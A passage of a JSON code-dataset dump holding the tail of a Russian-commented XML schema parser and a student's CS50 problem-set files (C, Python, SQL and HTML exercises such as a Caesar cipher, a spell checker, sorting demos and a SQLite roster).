attr_dict is None:\n return index\n\n for attr in attr_dict:\n if attr == 'name':\n index.name = attr_dict[attr].value\n elif attr == 'field':\n detail = IndexDetail()\n detail.value = attr_dict[attr].value\n index.details.append(detail)\n elif attr == 'props':\n for prop in attr_dict[attr].value.split(', '):\n if prop == 'local':\n index.local = True\n elif prop == 'uniqueness':\n index.kind = 'uniqueness'\n elif prop == 'fulltext':\n index.kind = 'fulltext'\n else:\n raise UnsupportedPropertyError(prop)\n else:\n raise UnsupportedAttributeError(attr)\n return index\n\n\ndef _create_constraint_detail(attr_dict):\n \"\"\" Создать объект Детали ограничения, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Детали ограничения.\n \"\"\"\n detail = ConstraintDetail()\n for attr in attr_dict:\n if attr == 'value':\n detail.value = attr_dict[attr].value\n else:\n raise UnsupportedAttributeError(attr)\n return detail\n\n\ndef _create_index_detail(attr_dict):\n \"\"\" Создать объект Детали индекса, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Детали индекса.\n \"\"\"\n detail = IndexDetail()\n for attr in attr_dict:\n if attr == 'value':\n detail.value = attr_dict[attr].value\n elif attr == 'expression':\n detail.expression = attr_dict[attr].value\n elif attr == 'descend':\n detail.descend = attr_dict[attr].value\n else:\n raise UnsupportedAttributeError(attr)\n return detail\n\n\nclass ParseError(Exception):\n \"\"\" Подкласс исключений, порождаемых в процессе парсинга XML-представления\n схемы БД.\n \"\"\"\n pass\n\n\nclass UnsupportedTagError(ParseError):\n \"\"\" Подкласс исключений, порождаемых при обнаружении неподдерживаемого тега\n в XML-представлении БД.\n \"\"\"\n def __init__(self, tag):\n self.tag = tag\n\n def __str__(self):\n return 'Неподдерживаемый тэг \\\"' + self.tag + '\\\"'\n\n\nclass UnsupportedAttributeError(ParseError):\n \"\"\" Подкласс исключений, порождаемых при обнаружении неподдерживаемого\n атрибута в XML-представлении БД.\n \"\"\"\n def __init__(self, attribute):\n self.attribute = attribute\n\n def __str__(self):\n return 'Неподдерживаемый атрибут \\\"' + self.attribute + '\\\"'\n\n\nclass UnsupportedPropertyError(ParseError):\n \"\"\" Подкласс исключений, порождаемых при обнаружении неподдерживаемого\n свойства в XML-представлении БД.\n \"\"\"\n def __init__(self, prop):\n self.prop = prop\n\n def __str__(self):\n return 'Неподдерживаемое свойство \\\"' + self.prop + '\\\"'\n\n\nclass UniqueViolationError(ParseError):\n \"\"\" Подкласс исключений, порождаемых в случае нарушения уникальности\n имен некоторых элементов представления БД в виде XML.\n \"\"\"\n def __init__(self, name):\n self.name = name\n\n def __str__(self):\n return 'Элемент заданного типа с именем \\\"' + self.name + '\\\" уже определен'"
}
] | 20 |
jmruzafa/cd50-problem-set | https://github.com/jmruzafa/cd50-problem-set | bce816af8bb3e20b66ac1d6084b563ad1f2d2449 | e7ff8ec1df2bf64e84b78d4e580e088d182ec300 | ab68f9ee060900d20101ecef46adfd46c7442c23 | refs/heads/master | 2022-10-12T03:24:09.461453 | 2020-06-10T17:47:14 | 2020-06-10T17:47:14 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 35,
"blob_id": "24249ebbd8217abae4e1f14b0a3c7b4ab7c030d1",
"content_id": "8abbf94a006de1323fae216c80f0d3290159424c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 4,
"path": "/pset7/movies/8.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT p.name FROM people p\nINNER JOIN stars s on p.id = s.person_id\nINNER JOIN movies m ON m.id = s.movie_id\n WHERE m.title = \"Toy Story\""
},
{
"alpha_fraction": 0.7651899456977844,
"alphanum_fraction": 0.7660129070281982,
"avg_line_length": 139.21153259277344,
"blob_id": "1de807d0f61b627db2849bdf17c21dd32082287f",
"content_id": "bef8699224433dd393b890994298bbaeca33dca2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 7291,
"license_type": "no_license",
"max_line_length": 850,
"num_lines": 52,
"path": "/pset8/web/homepage/about.html",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <link href=\"https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css\" rel=\"stylesheet\">\n <link href=\"styles.css\" rel=\"stylesheet\">\n <title>Matterhorn Expeditions</title>\n </head>\n <body>\n <header>\n <div class=\"main\">\n <div class=\"logo\">\n <a href=\"index.html\" >Matterhorn Experience</a>\n </div>\n <ul>\n <li><a href=\"index.html\">Home</a></li>\n <li><a href=\"expeditions.html\">Expeditions</a></li>\n <li><a href=\"about.html\">About</a></li>\n <li><a href=\"contact.html\">Contact</a></li>\n </ul>\n </div>\n </header>\n <div class=\"title\">\n <h1>About Us</h1>\n </div>\n <div class=\"container\">\n Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed tempor tempor consectetur. In elit odio, interdum eget malesuada id, cursus at est. Aenean volutpat faucibus sollicitudin. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Maecenas vehicula leo vel tellus pharetra iaculis. Mauris cursus pharetra metus. Aliquam erat volutpat. Quisque in ex porttitor, finibus quam ut, efficitur felis. Fusce fringilla nunc ac elit luctus, sed vestibulum mi accumsan. Nunc a felis ac mi ornare imperdiet non vitae felis. Morbi feugiat lorem vel commodo mollis. Vivamus et dolor eget nisl dignissim consequat. Pellentesque nisi ex, bibendum id metus placerat, egestas tempus velit. Nulla pharetra eget nisi ac luctus. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\n\nCurabitur nec gravida velit. Aenean fringilla quis risus et scelerisque. Maecenas bibendum est libero, ut viverra lacus venenatis in. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Sed vehicula in massa eu imperdiet. Sed pellentesque nisl eu nisi ultricies, ac lacinia dui elementum. Ut feugiat non ipsum sed malesuada. Nulla dignissim augue diam, feugiat varius quam rutrum ut.\n\nAenean cursus vel magna molestie condimentum. Aliquam neque lacus, euismod sit amet finibus ut, vestibulum eu odio. Phasellus sollicitudin, libero sed malesuada porttitor, lectus est volutpat erat, non viverra lorem nulla non ex. Quisque vel dui sit amet libero dignissim aliquet. In pretium faucibus est, sed mollis nisl aliquam eu. Vivamus id nulla ultrices mi rhoncus semper in nec nibh. Suspendisse consectetur nisi fermentum lacus volutpat pulvinar. Proin leo purus, faucibus ut dolor ut, consectetur bibendum sapien. Quisque vel porttitor turpis. Quisque dictum leo ut massa malesuada, ac sagittis erat euismod. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Donec iaculis, ligula non euismod aliquet, nisi lacus laoreet tellus, non interdum eros nulla non odio. Ut vitae tempor risus, eu tincidunt dui.\n\nCurabitur posuere enim sapien, congue elementum dui consequat cursus. Pellentesque sodales blandit justo, non laoreet dolor elementum sit amet. Integer justo eros, volutpat et pharetra nec, rhoncus sed justo. Quisque et fermentum metus. Pellentesque varius ipsum nulla, et tempus nisi posuere ornare. Pellentesque vitae est orci. Ut quis ex id lorem facilisis varius id sed est. Vivamus scelerisque mi nec felis sollicitudin, et commodo velit viverra. Aliquam vitae tellus tempus, tristique magna vel, auctor libero. Suspendisse maximus leo justo, quis sodales diam pharetra vel. Aenean metus tortor, tincidunt vel placerat id, scelerisque at turpis. Donec lacinia id lacus et pulvinar. 
Praesent pharetra justo quis neque vulputate, id ultrices ante hendrerit.\n\nNulla odio lectus, porta in lorem non, porttitor auctor nibh. Nunc ultrices est varius, aliquam erat non, dictum quam. Pellentesque viverra at elit vel suscipit. Curabitur sollicitudin auctor velit sit amet pellentesque. Nunc justo dui, congue sit amet urna vitae, dictum convallis ante. Maecenas risus orci, dictum non eros at, dictum tincidunt dui. Proin placerat leo a orci vulputate, in laoreet sapien pretium. Praesent vitae tellus vel magna dapibus congue. Maecenas aliquam odio sed risus dignissim dapibus. Vestibulum pharetra purus felis, id cursus turpis ullamcorper vel. Donec ullamcorper augue nec ipsum vulputate posuere. Phasellus vitae consectetur quam, ut fringilla augue.\n\nMaecenas malesuada aliquet justo, vel pulvinar eros pharetra in. Vivamus sed erat eu eros tempus egestas. Nullam volutpat consequat tincidunt. Etiam consequat semper mi ut tempus. Cras elementum nisl vitae gravida tristique. Suspendisse semper tempus orci, eget efficitur quam pretium ac. Nulla vitae felis non est pharetra bibendum ut ut orci. Vestibulum eget massa a elit efficitur tincidunt sed vulputate quam. Quisque luctus enim et volutpat vestibulum. Sed aliquam porta turpis eu viverra. Vestibulum eget auctor lacus, quis semper magna. Maecenas et semper nunc.\n\nMorbi condimentum ornare ante non facilisis. Morbi viverra nunc id vehicula facilisis. Suspendisse ac erat vulputate, venenatis justo quis, lobortis libero. Suspendisse non sagittis lacus. Nam ut ultrices nulla. Proin laoreet ante quis metus bibendum tristique. Duis vitae imperdiet ex. Praesent eu lacus non dolor condimentum pellentesque. Fusce sed posuere felis, sit amet tempus urna. Nam ante magna, aliquam ultrices semper quis, tristique quis libero. Quisque in enim eget urna egestas porta.\n\nVivamus orci massa, laoreet vitae diam at, lobortis imperdiet erat. Ut scelerisque nibh vel ipsum mattis tincidunt. Interdum et malesuada fames ac ante ipsum primis in faucibus. Ut euismod ligula eu laoreet pretium. Aliquam erat volutpat. Donec viverra justo ut urna placerat faucibus. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Integer facilisis felis rutrum, egestas arcu vitae, dignissim leo. Sed in urna at augue convallis imperdiet eu vel tortor. Maecenas vitae felis tincidunt, ullamcorper dolor ac, porta sapien. Etiam iaculis euismod eros ut commodo. Proin posuere vitae sapien eget faucibus. Mauris aliquam, ligula nec cursus bibendum, enim sem tempor libero, at tincidunt magna nisl suscipit dolor. Maecenas finibus rutrum diam, eu dictum nulla venenatis quis.\n\nMaecenas purus lacus, laoreet et quam eu, aliquam pharetra felis. Duis molestie hendrerit gravida. Donec et sollicitudin mauris. Aliquam augue leo, ullamcorper vel est et, dapibus bibendum augue. Pellentesque viverra nibh sit amet tristique porttitor. Nullam dignissim tortor felis, in iaculis ante interdum a. Vestibulum ac nibh mi. Morbi interdum felis id risus luctus luctus. Nunc sodales scelerisque massa, quis facilisis lorem mollis non. Nullam hendrerit tincidunt sapien in feugiat. Phasellus placerat convallis diam ac consectetur. Sed in diam lorem. Nulla facilisi. Pellentesque posuere auctor tristique. Nullam volutpat non lorem egestas porta. 
Donec ut tortor sed erat mattis pellentesque.\n </div>\n <div class=\"button\">\n <a href=\"https://youtu.be/FCPdIvXo2rU\" target=\"_blank\" class=\"btn\">Watch Video</a>\n <a href=\"#\" class=\"btn\">Learn More</a>\n </div>\n \n <script src=\"js/scripts.js\"></script>\n </body>\n</html>\n"
},
{
"alpha_fraction": 0.5489361882209778,
"alphanum_fraction": 0.5595744848251343,
"avg_line_length": 27.074626922607422,
"blob_id": "fd2f5b3f58fb603a6446092a89d412ba53ee34f7",
"content_id": "66b320f14711c5dc9ac2415e2d86593a7c072248",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1880,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 67,
"path": "/pset2/caesar.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <cs50.h>\n#include <string.h>\n#include <ctype.h>\n#include <stdlib.h>\n\n//function definition \nbool is_numeric(string str);\n\nint main(int argc, string argv[])\n{\n //if user does not provide the \"key\" stop the program\n if(argc < 2 || argc > 2 || !is_numeric(argv[1]))\n {\n printf(\"Usage: ./caesar key\\n\");\n return 1;\n }\n \n //get key to cypher\n int rotation = (int) strtol(argv[1], NULL, 10);\n \n //ask the user for the text that will be parsed\n string plaintext = get_string(\"plaintext: \");\n \n //length of the text\n int len = strlen(plaintext);\n char *ciphertext = malloc(strlen(plaintext) + 1);\n\n\n //Checks for the number of letters\n int ascii_code = 0;\n int new_code = 0;\n\n for (int i = 0, n = len; i < n; i++)\n {\n //Checks if a character is an alphanumeric character\n if (isalpha(plaintext[i]))\n {\n //choose the base of ASCII code depending if character is upper or lower.\n int base = isupper(plaintext[i]) ? 65 : 97;\n //get actual ascii code\n ascii_code = plaintext[i];\n //get new ascii code (if the rotation goes beyond the last letter (Z or z) it returns back to A or a\n new_code = (((ascii_code - base) + rotation) % 26) + base;\n ciphertext[i] = new_code;\n }\n else\n {\n //exclude all no alphanumeric characters \n ciphertext[i] = plaintext[i];\n } \n }\n printf(\"ciphertext: %s\\n\", ciphertext);\n}\n\nbool is_numeric(string str) \n{\n // loop Through each character in the string\n for(int i = 0, n = strlen(str); i < n; i++)\n {\n if(!isdigit(str[i])) // Check if a single character \"x\" its a digit\n {\n return false; // if its not return false\n } \n }\n return true; // else return true\n}"
},
{
"alpha_fraction": 0.5846675038337708,
"alphanum_fraction": 0.5905172228813171,
"avg_line_length": 19.173913955688477,
"blob_id": "cc9d45f2db598574c8afab4149e070e09378dd8a",
"content_id": "8c7af97aac269f9a617bdc5a245ae721105f90cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3248,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 161,
"path": "/pset5/speller/dictionary.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "// Implements a dictionary's functionality\n\n#include <stdbool.h>\n#include <stdlib.h>\n#include <string.h>\n#include <stdio.h>\n#include <ctype.h>\n\n#include \"dictionary.h\"\n\n// Represents a node in a hash table\ntypedef struct node\n{\n char word[LENGTH + 1];\n struct node *next;\n}\nnode;\n\nnode *add_node(node *p, char *word);\nnode *remove_node (node *p);\n\n// Number of buckets in hash table\nconst unsigned int HASH_T_SIZE = 100;\n\n// Number of words in dicctionary\nunsigned long words_counter = 0;\n\n// Hash table\nnode *hash_table[HASH_T_SIZE];\n\n// Returns true if word is in dictionary else false\nbool check(const char *word)\n{\n // String to lowercase\n char term[strlen(word) + 1];\n strcpy(term, word);\n for (int i = 0; i < strlen(word); i++)\n {\n term[i] = tolower(word[i]);\n } \n\n // Get the hash value for a word\n int hash_value = hash(term) % HASH_T_SIZE;\n \n node *dict = hash_table[hash_value];\n\n // Iterate the list\n while (dict != NULL)\n {\n if (strcasecmp(dict->word, word) == 0)\n {\n return true;\n }\n // Move list pointer\n dict = dict->next;\n }\n\n return false;\n}\n\n// Hashes word to a number.. \nunsigned long hash(const char *word)\n{\n //djb2 hash function from http://www.cse.yorku.ca/~oz/hash.html\n unsigned long hash = 5381;\n int c;\n\n while ((c = *word++))\n {\n hash = ((hash << 5) + hash) + c; /* hash * 33 + c */\n }\n return hash;\n}\n\n// Loads dictionary into memory, returning true if successful else false\nbool load(const char *dictionary)\n{\n words_counter = 0;\n\n // Open dictionary file \n FILE *file = fopen(dictionary, \"r\");\n if (file == NULL)\n {\n return false;\n }\n\n // Allocate memory\n char *word = malloc(sizeof(char) * LENGTH);\n\n while (fscanf(file, \"%s\", word) != EOF)\n {\n // Add words to hash table\n int hash_value = hash(word) % HASH_T_SIZE;\n // Iterate over dictionary\n hash_table[hash_value] = add_node(hash_table[hash_value], word);\n words_counter++;\n }\n\n // Free allocated memory\n free(word);\n\n // Close dictionary\n fclose(file);\n\n return true;\n\n}\n\n// Returns number of words in dictionary if loaded else 0 if not yet loaded\nunsigned int size(void)\n{\n // Counter\n return words_counter;\n}\n\n// Unloads dictionary from memory, returning true if successful else false\nbool unload(void)\n{\n // Iterate over hash table\n for (int i = 0; i < HASH_T_SIZE; i++)\n {\n // Remove linked list connected to the pointer\n while (hash_table[i] != NULL)\n {\n hash_table[i] = remove_node(hash_table[i]);\n }\n }\n\n return true;\n}\n\n\n// Auxiliar functions that manage the nodes list\nnode *add_node(node *p, char *word)\n{\n // Allocate some memory for the node\n node *n = malloc(sizeof(node));\n if (n == NULL)\n {\n return NULL;\n }\n // Copy dictionary word in the node\n strcpy(n -> word, word);\n\n // Point to the new node\n n -> next = p;\n\n return n;\n}\n\nnode *remove_node (node *p)\n{\n // Temporary pointer to the next node of that we want to remove\n node *n = p->next;\n\n free(p);\n\n // Return the new node where pointed at\n return n;\n\n}\n"
},
{
"alpha_fraction": 0.5096079707145691,
"alphanum_fraction": 0.5549577474594116,
"avg_line_length": 25.571428298950195,
"blob_id": "96378bbe62bc19739e7947f220edb8cfd03b24e9",
"content_id": "9d046b3e1f62a50a40f7d1028e101143e643de59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1301,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 49,
"path": "/pset6/readability/readability.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "import cs50\n\ndef main():\n # ask the user for the text to be parsed\n text = cs50.get_string(\"Text: \")\n\n # length of the string\n length = len(text)\n\n # initialise some variables\n letters = 0\n sentences = 0\n words = len(text.split(\" \"))\n\n \n\n\n # check for the number of letters\n for i in range(0, length):\n # check if character is alphanumeric \n if text[i].isalnum():\n letters += 1\n # check if character is a space\n # elif text[i].isspace() or text[i] == \"\\0\":\n # words += 1\n elif text[i] == \".\" or text[i] == \"!\" or text[i] == \"?\":\n sentences += 1\n\n # calculate L & S of Coleman-Liau index\n # to be precised we must cast the integers into floats first\n L = float(letters) / float(words) * 100.00\n S = float(sentences) / float(words) * 100.00\n\n # calculate the index of readability of Coleman-Liau.\n # the formula is: index = 0.0588 * L - 0.296 * S - 15.8\n index = round(0.0588 * L - 0.296 * S - 15.8)\n\n grade = \"Grade\"\n # if grade is between 1 and 16\n if index >= 1 and index <= 16:\n print(f\"{grade} {index}\")\n # index is higher that 16\n elif index > 16:\n print(f\"{grade} 16+\")\n # grade index below 1\n else:\n print(\"Before Grade 1\")\n\nmain()"
},
{
"alpha_fraction": 0.5766369104385376,
"alphanum_fraction": 0.5877976417541504,
"avg_line_length": 29.272727966308594,
"blob_id": "8440f1ca2fef9b825865fe54f55ebb47e783ef31",
"content_id": "3d80d68698d1c694ed8f9661f42ed635c2c556b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1345,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 44,
"path": "/pset7/houses/import.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "import cs50\nimport csv\nfrom sys import argv, exit\nfrom cs50 import SQL\n\n\n# number of arguments\nargc = len(argv)\n\n# if there aren't two params with data and sequence then exit\nif argc != 2:\n print(\"Usage: import.py characters.csv\")\n exit(1)\n\n# get data file path + name\nfname = argv[1]\n\n# if they don't fit the expected extension then exit\nif not fname.endswith(\".csv\"):\n print(\"Usage: import.py characters.csv\")\n exit(1)\n\n# connect to db file\nstudentsdb = SQL(\"sqlite:///students.db\")\n# open the files\nwith open(fname, \"r\") as characters:\n \n dic = csv.DictReader(characters, delimiter=\",\")\n for row in dic:\n\n name = row[\"name\"]\n name_list = name.split()\n\n if len(name_list) == 2:\n first_name = name_list[0]\n last_name = name_list[1]\n studentsdb.execute(\"INSERT INTO students (first, middle, last, house, birth) VALUES(?, ?, ?, ?, ?)\",\n first_name, None, last_name, row[\"house\"], row[\"birth\"])\n elif len(name_list) == 3:\n first_name = name_list[0]\n middle_name = name_list[1]\n last_name = name_list[2]\n studentsdb.execute(\"INSERT INTO students (first, middle, last, house, birth) VALUES(?, ?, ?, ?, ?)\",\n first_name, middle_name, last_name, row[\"house\"], row[\"birth\"])\n\n \n\n\n"
},
{
"alpha_fraction": 0.42335766553878784,
"alphanum_fraction": 0.43065693974494934,
"avg_line_length": 12.75,
"blob_id": "9158bd69b23344a1e1d4e33eab31f25cfede3051",
"content_id": "f37a9c89e5bddf220e1d1c327fe45fb1d6144d34",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 274,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 20,
"path": "/pset3/swap.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n\nvoid swap (int *a, int *b);\n\nint main (void)\n{\n int x = 4, y = 8;\n\n printf(\"x: %i, y: %i\\n\", x, y);\n swap(&x, &y);\n printf(\"x: %i, y: %i\\n\", x, y);\n}\n\nvoid swap (int *a, int *b)\n{\n int t = *a;\n *a = *b;\n *b = t;\n}"
},
{
"alpha_fraction": 0.3958809971809387,
"alphanum_fraction": 0.4038901627063751,
"avg_line_length": 20.317073822021484,
"blob_id": "a372396736618b5ec9323d23887af1c3639df523",
"content_id": "2e3eb5a23007c3e0ef864cf6ef594e12df7662e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 874,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 41,
"path": "/pset1/mariomore.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <cs50.h>\n#include <stdio.h>\n\nint main(void)\n{\n //get height value from user\n bool error = true;\n int height = 0;\n //ask until valid height value\n do\n {\n height = get_int(\"Height: \");\n if (height >= 1 && height <= 8)\n {\n error = false;\n }\n }\n while(error);\n\n //loop for pyramid height\n for (int i = 1; i <= height; i++)\n {\n //loop to draw the pyramid blocks\n for (int j = 1; j <= height + i ; j++)\n {\n if (j > height - i){\n printf(\"#\");\n }\n else{\n printf(\" \");\n }\n //if we have finished first side of the pyramid add empty spaces\n if (j == height)\n {\n printf(\" \");\n }\n }\n //insert a new line\n printf(\"\\n\");\n }\n}\n"
},
{
"alpha_fraction": 0.657489001750946,
"alphanum_fraction": 0.6640968918800354,
"avg_line_length": 35.36000061035156,
"blob_id": "38a4c501ab5dc5e53ef492d20f44ca08f10fa65d",
"content_id": "e016daa7a3ab10a8959513bd4d716a909935ac5e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 908,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 25,
"path": "/pset7/houses/roster.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "import csv\nfrom sys import argv, exit\nfrom cs50 import SQL\n\n# create an array with the house names\nhouseslist = [\"Gryffindor\", \"Slytherin\", \"Hufflepuff\", \"Ravenclaw\"]\n\n# check that the script recevies a param with the name file and the name is into the list\nif len(argv) != 2 or not argv[1] in houseslist:\n print(\"Usage: python roster.py house\")\n exit(1)\n\nhousename = argv[1]\n# open the database file\ndb = SQL(\"sqlite:///students.db\")\n\n# get the list of houses\nhouse = db.execute(\"SELECT first, middle, last, birth FROM students WHERE house = (?) ORDER BY last, first\", housename)\n\n#go through the house getting students' data\nfor student in house:\n if student[\"middle\"] == None:\n print(student[\"first\"] + \" \" + student[\"last\"] + \", born \" + str(student[\"birth\"]))\n else:\n print(student[\"first\"] + \" \" + student[\"middle\"] + \" \" + student[\"last\"] + \", born \" + str(student[\"birth\"]))"
},
{
"alpha_fraction": 0.47590869665145874,
"alphanum_fraction": 0.4987320303916931,
"avg_line_length": 19.413793563842773,
"blob_id": "53e82a3d12fb6828f735f9b0fa0389314daac464",
"content_id": "54cd178925b24e47392aeb3e54dbfd09f04d97dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1183,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 58,
"path": "/algorithms/insertionsort.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <time.h>\n\nvoid insertion_sort(int list[], int size);\nint print_array(int size, int array[]);\n\nint main(void)\n{\n int n;\n int list[] = { 4,3, 2, 10, 12, 1, 5, 6};\n \n int size = sizeof list / sizeof list[0];\n printf(\"Initial array: \");\n print_array(size, list);\n\n //start timer\n clock_t c0 = clock();\n\n //order the array\n printf(\"sorting....\\n\");\n insertion_sort(list, size);\n \n //stop timer\n clock_t c2 = clock();\n printf(\"Ordered array: \");\n print_array(size, list);\n \n double total_diff_ms = (c2 - c0) * 1000. / CLOCKS_PER_SEC;\n printf(\"Sorting took %f ms\\n\", total_diff_ms);\n}\n\nvoid insertion_sort(int list[], int size)\n{\n int tmp, j;\n \n for (int i = 0; i < size; i++)\n {\n tmp = list[i];\n j = i;\n while (j > 0 && tmp < list[j-1])\n {\n list[j] = list[j-1];\n j = j -1;\n } \n print_array(size, list); \n }\n}\n\nint print_array(int size, int array[])\n{\n for (int i = 0; i < size; i++)\n {\n i < size-1 ? printf(\"%i, \", array[i]) : printf(\"%i\", array[i]);\n }\n printf(\"\\n\");\n return 0;\n}"
},
{
"alpha_fraction": 0.4769904911518097,
"alphanum_fraction": 0.49671292304992676,
"avg_line_length": 19.44776153564453,
"blob_id": "c25db99c91e0495034e6bcdb368c7c988b41ccbb",
"content_id": "14879e5bf667da2ce80c7f6630eedfa0b5125b59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1369,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 67,
"path": "/algorithms/bubblesorting.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <time.h>\n\nvoid bubble_sorting(int arr[], int size);\nvoid swap(int *xp, int *yp);\nint print_array(int size, int array[]);\n\nint main(void)\n{\n int n;\n int list[] = { 6,3, 8, 5, 2, 7, 4, 1};\n\n int found = -1;\n \n int size = sizeof list / sizeof list[0];\n printf(\"Initial array: \");\n print_array(size, list);\n //order the array\n \n printf(\"sorting...\\n\");\n //start timer\n clock_t c0 = clock();\n bubble_sorting(list, size);\n \n //stop timer\n clock_t c2 = clock();\n printf(\"Ordered array: \");\n print_array(size, list);\n \n double total_diff_ms = (c2 - c0) * 1000. / CLOCKS_PER_SEC;\n printf(\"Sorting took %f ms\\n\", total_diff_ms);\n}\n\nvoid bubble_sorting(int arr[], int size)\n{\n for (int i = 0; i < size-1; i++)\n {\n for (int j = 0; j < size-i-1; j++)\n {\n if (arr[j] > arr[j+1])\n {\n swap(&arr[j], &arr[j+1]);\n }\n }\n print_array(size, arr);\n }\n\n}\n\nvoid swap(int *ap, int *bp) \n{ \n //swap the pointer to each value and that's all :D\n int temp = *ap; \n *ap = *bp; \n *bp = temp; \n} \n\nint print_array(int size, int array[])\n{\n for (int i = 0; i < size; i++)\n {\n i < size-1 ? printf(\"%i, \", array[i]) : printf(\"%i\", array[i]);\n }\n printf(\"\\n\");\n return 0;\n}"
},
{
"alpha_fraction": 0.502109706401825,
"alphanum_fraction": 0.5253164768218994,
"avg_line_length": 24,
"blob_id": "897caa983ca8fab2ac53cdbcb1828e00eae7c6a7",
"content_id": "c5659feae27b5bc1fc79e7099ace2c9eeaf888f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 474,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 19,
"path": "/pset6/mario/less/mario.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#!/bin/python3\nimport cs50\n\n#ask until valid height value\nwhile True:\n height = cs50.get_int(\"Height: \")\n if height >= 1 and height <= 8:\n break\n# loop for pyramid height\nfor i in range (1, height+1):\n # loop to draw the pyramid blocks\n for base in range (height, 0, -1):\n # print(f\"i: {i}, b: {base}\")\n if base <= i:\n print(\"#\", end=\"\")\n else:\n print(\" \", end=\"\")\n # insert a new line\n print(\"\", end=\"\\n\")"
},
{
"alpha_fraction": 0.5928571224212646,
"alphanum_fraction": 0.6142857074737549,
"avg_line_length": 21.13157844543457,
"blob_id": "e06d8b6747fcac437c33e3218138bc2f8f3e0869",
"content_id": "eaa9ba6a307a4befa2e9325c830ddcb87e70548e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 840,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 38,
"path": "/pset6/cash/cash.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#!/bin/python3\nimport cs50\nimport math\n\ndef main():\n\n # array of coins\n coin_array = [25, 10, 5, 1]\n\n while True:\n # ask for the change owed\n dollars = cs50.get_float(\"Change owed: \")\n if dollars >= 0:\n break\n \n # round input to cents \n cents = round(dollars * 100)\n coins = findCoins(cents, coin_array, 0);\n\n\n # recursive function call to get coins amount\n print(\"\", coins);\n\n\n# recursive function\ndef findCoins(cents, coin_array, position):\n # get the number of coins of selected\n coins = round (cents // coin_array[position])\n remain = round(cents % coin_array[position])\n \n # this is the condition to exit from recursion\n if remain != 0:\n # call function recursively\n coins += findCoins(remain, coin_array, position +1)\n return coins\n\n\nmain()"
},
{
"alpha_fraction": 0.46501925587654114,
"alphanum_fraction": 0.4736842215061188,
"avg_line_length": 27.587156295776367,
"blob_id": "bbaef0f9958c2c4b0e18800e46014d8428c834e5",
"content_id": "d96f208b12dc590e0c40009a4bd5f6823d4796f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3116,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 109,
"path": "/pset4/filter-more/helpers.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
